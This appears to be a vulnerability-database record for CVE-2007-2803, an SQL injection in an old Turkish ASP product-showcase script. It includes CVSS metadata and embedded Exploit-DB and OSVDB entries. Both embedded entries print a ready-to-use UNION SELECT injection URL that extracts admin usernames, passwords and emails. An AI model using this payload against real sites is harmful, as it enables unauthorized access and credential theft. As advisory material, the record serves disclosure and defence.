ID CVE-2007-2803Type cveReporter cve@mitre.orgModified 2017-10-11T01:32:00
Description
SQL injection vulnerability in default.asp in Vizayn Urun Tanitim Sitesi 0.2 allows remote attackers to execute arbitrary SQL commands via the id parameter in a haberdetay action.
{"id": "CVE-2007-2803", "bulletinFamily": "NVD", "title": "CVE-2007-2803", "description": "SQL injection vulnerability in default.asp in Vizayn Urun Tanitim Sitesi 0.2 allows remote attackers to execute arbitrary SQL commands via the id parameter in a haberdetay action.", "published": "2007-05-22T19:30:00", "modified": "2017-10-11T01:32:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2803", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/4007", "http://www.securityfocus.com/bid/24238", "http://secunia.com/advisories/25348", "https://exchange.xforce.ibmcloud.com/vulnerabilities/34403", "http://osvdb.org/36232", "http://www.securityfocus.com/bid/24079"], "cvelist": ["CVE-2007-2803"], "type": "cve", "lastseen": "2019-05-29T18:08:59", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "5695b9f2f1ce2c8c84bcb713ba67c1df"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "365902b24f189a61362da1a13ca56452"}, {"key": "cpe23", "hash": "6290f32648276a009f3deb5a786dbea9"}, {"key": "cvelist", "hash": "47aa60f755a9330991b8c595daaa4bb2"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "136d4028129f0876ea12ab3c0506862a"}, {"key": "href", "hash": "a4343771d78fe8077af35c9222beada1"}, {"key": "modified", "hash": "2c652a2381daa6b6d29e5a97963f096b"}, {"key": "published", "hash": "8ae7d12260e66cb00a3955eddbf317f8"}, {"key": "references", "hash": "06812a917e580ba8c4c38d520015e9d7"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "1f19e50ee551a3c49204edfddc4616c7"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "803cc9caf03fc650595d078ea16c35c270c0d884d192a3890172d343b8581515", "viewCount": 0, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2019-05-29T18:08:59"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:36232"]}, {"type": "exploitdb", "idList": ["EDB-ID:4007"]}], "modified": "2019-05-29T18:08:59"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "cpe": ["cpe:/a:vizayn_urun:tanitim_sitesi:0.2"], "affectedSoftware": [{"name": "vizayn_urun tanitim_sitesi", "operator": "eq", "version": "0.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:vizayn_urun:tanitim_sitesi:0.2:*:*:*:*:*:*:*"], "cwe": ["CWE-89"]}
{"exploitdb": [{"lastseen": "2016-01-31T19:53:38", "bulletinFamily": "exploit", "description": "Vizayn Urun Tanitim Sistemi 0.2 (tr) Remote SQL Injection Vulnerability. CVE-2007-2803. Webapps exploit for asp platform", "modified": "2007-05-30T00:00:00", "published": "2007-05-30T00:00:00", "id": "EDB-ID:4007", "href": "https://www.exploit-db.com/exploits/4007/", "type": "exploitdb", "title": "Vizayn Urun Tanitim Sistemi 0.2 tr Remote SQL Injection Vulnerability", "sourceData": "/* Vizayn Urun Tanitim Sistemi v0.2 (tr) Remote SQL Injection Vulnerability\nFound by : ertuqrul\nPoC By : BAHADIR\nContact: bahadir@bsdmail.org\nScripr HomePage: http://www.vizayn.web.tr/ws.asp?ws=102\nScript Demo URL: http://ws.vizaynhosting.com/V02/\nPrice : 55YTL \n\nPoF Concept:\nHttp://[HOST]/[PATH]/default.asp?islem=haberdetay&id=-1%20union%20select%20USERNAME,PASSWORD,EMAIL,USERNAME%20from%20ADMIN\nTakes admin username ,password and email adress from admin table \n\nW0rdz:Maksat Birseyler Eklemek Olsun =)\nGreetZ Goes To : BURCU (Her Ne Kadar Bilmesede :D ) Ayrica Dostum Erchin'e ( Ercin Kardesim, Warcraftin Amk. Birak Su Malak Oyunu :D ) \nand also to Str0ke For Posting :)\n*/\n\n# milw0rm.com [2007-05-30]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4007/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[PATH]/default.asp?islem=haberdetay&id=-1%20union%20select%20USERNAME,PASSWORD,EMAIL,USERNAME%20from%20ADMIN\n## References:\n[Secunia Advisory ID:25348](https://secuniaresearch.flexerasoftware.com/advisories/25348/)\nISS X-Force ID: 34403\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4007\n[CVE-2007-2803](https://vulners.com/cve/CVE-2007-2803)\nBugtraq ID: 24238\nBugtraq ID: 24079\n", "modified": "2007-05-21T13:03:47", "published": "2007-05-21T13:03:47", "href": "https://vulners.com/osvdb/OSVDB:36232", "id": "OSVDB:36232", "title": "Vizayn Urun Tanitim Sitesi default.asp id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
